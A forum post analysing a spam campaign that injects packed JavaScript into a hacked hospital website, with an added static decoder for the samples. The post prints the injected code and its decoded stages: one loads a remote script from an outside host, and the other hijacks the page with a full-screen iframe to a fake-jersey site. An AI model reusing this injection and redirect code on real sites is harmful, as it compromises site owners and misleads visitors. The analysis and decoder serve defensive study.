Check out the massive loop these fake NFL jersey spammers put everyone through whenever they post massive amounts of spam to forums around the world...
Our ridiculous Chinese "cheap NFL jersey" high-volume spammer keeps coming back, and he keeps posting dozens to hundreds of hacked server links.
The pattern goes:
JavaScript Obfuscation injected onto a hacked domain:
http
://www.herzoghospital.org/site/news/cheap-nfl-jerseys.html
Code:
<script language="javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('c 1=3.4(\'9\');1.a(\'b\',\'5://d.8.0.2/6.7\');',62,14,'1qidc|a|com|document|getElementById|http|jquery|js|kr3|ourjs|setAttribute|src|var|xiaofengfeng'.split('|'),0,{}))
</script>
Step 1: load secondary obfuscated JavaScript:
Code:
var a=document.getElementById('ourjs');a.setAttribute('src','http://xiaofengfeng.kr3.1qidc.com/jquery.js');
http
://xiaofengfeng.kr3.1qidc.com/jquery.js
Code:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6.7.8.5="<4 1=\'2%\' 3=\'9\' a=\'i\' g=\'0\' f=\'e://b.c.d.h/\'>";',19,19,'|width|100|scrolling|iframe|innerHTML|top|document|body|no|height|www|jerseyscheap|us|http|src|frameborder|com|2000'.split('|'),0,{}))
Step 2: Eval that function to send the user to the actual target domain:
Code:
top.document.body.innerHTML="<iframe width='100%' scrolling='no' height='2000' frameborder='0' src='http://www.jerseyscheap.us.com/'>";
http
://www.jerseyscheap.us.com/
Phew.
What a runaround.
You know that phrase about being a good businessman? "Don't sh*t where you eat?" These guys sh*t where everybody eats. They're complete scumbags. They don't care if they end up getting thousands of hosting agreements cancelled or destroy a significant number of otherwise harmless sites owned by unsuspecting operators.
And nobody will shut any of this down. It's depressing.
SiL
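
The two decoding steps in the post above can be reproduced without running the injected script. The following is an added example, not part of the original post: a static decoder for the `eval(function(p,a,c,k,e,d){...})` packer that reads the payload and keyword table as text and substitutes them, never calling `eval`. The function names are hypothetical choices made for this example; `STAGE1` and `STAGE2` are the two packed samples quoted in the post.

```javascript
// Added example: static decoder for eval(function(p,a,c,k,e,d){...}) packed
// scripts. The packed text is parsed and substituted as data; nothing is eval'd.
// STAGE1 and STAGE2 are the two packed samples quoted in the post.
const STAGE1 = String.raw`eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('c 1=3.4(\'9\');1.a(\'b\',\'5://d.8.0.2/6.7\');',62,14,'1qidc|a|com|document|getElementById|http|jquery|js|kr3|ourjs|setAttribute|src|var|xiaofengfeng'.split('|'),0,{}))`;
const STAGE2 = String.raw`eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6.7.8.5="<4 1=\'2%\' 3=\'9\' a=\'i\' g=\'0\' f=\'e://b.c.d.h/\'>";',19,19,'|width|100|scrolling|iframe|innerHTML|top|document|body|no|height|www|jerseyscheap|us|http|src|frameborder|com|2000'.split('|'),0,{}))`;

// Encode a keyword index the same way the packer's e() helper does.
function encodeIndex(n, radix) {
  const head = n < radix ? '' : encodeIndex(Math.floor(n / radix), radix);
  const r = n % radix;
  return head + (r > 35 ? String.fromCharCode(r + 29) : r.toString(36));
}

// Read (payload, radix, count, keywords) from the packer's trailing call.
function parsePacked(src) {
  const re = /\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)/;
  const m = re.exec(src);
  if (!m) return null; // not this packer, or a modified variant
  const unq = s => s.replace(/\\(.)/g, '$1'); // undo \' and \\ only
  return { payload: unq(m[1]), radix: +m[2], count: +m[3], keywords: m[4].split('|') };
}

// Substitute every token in the payload with its keyword, in one pass.
function unpack(src) {
  const p = parsePacked(src);
  if (!p) return null;
  const table = new Map();
  for (let i = 0; i < p.count; i++) {
    // Empty keyword slots mean "leave the token unchanged".
    if (p.keywords[i]) table.set(encodeIndex(i, p.radix), p.keywords[i]);
  }
  return p.payload.replace(/\b\w+\b/g, tok => table.get(tok) || tok);
}

// Decode one stage and list the URLs it would pull in next.
function traceStage(src) {
  const decoded = unpack(src);
  const urls = decoded ? decoded.match(/https?:\/\/[^\s'"<>]+/g) || [] : [];
  return { decoded, urls };
}

for (const [name, src] of [['stage 1', STAGE1], ['stage 2', STAGE2]]) {
  const { decoded, urls } = traceStage(src);
  console.log(name, '->', decoded, '\n  next hop:', urls.join(', '));
}
```

The parser only recognises the stock packer layout shown in the post; a variant that renames the wrapper or uses other string escapes returns `null` and would need the regular expression adjusted.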